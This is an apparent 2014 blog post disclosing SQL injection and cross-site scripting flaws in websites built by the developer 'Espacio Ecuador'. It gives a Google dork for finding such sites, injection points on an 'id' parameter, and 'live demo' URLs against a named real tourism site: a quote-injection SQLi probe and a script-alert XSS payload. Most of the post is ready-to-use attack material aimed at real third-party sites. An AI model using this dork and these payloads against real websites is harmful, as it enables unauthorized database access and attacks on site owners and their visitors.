Saturday, July 19, 2014

Espacio Ecuador XSS & SQLI



Dork:

intext:"developed by Espacio Ecuador"


Exploits:

http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>


Live Demo:

SQLI:

http://www.galapagostraveline.com/deal.html?opc=31%27


XSS:

http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E


at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)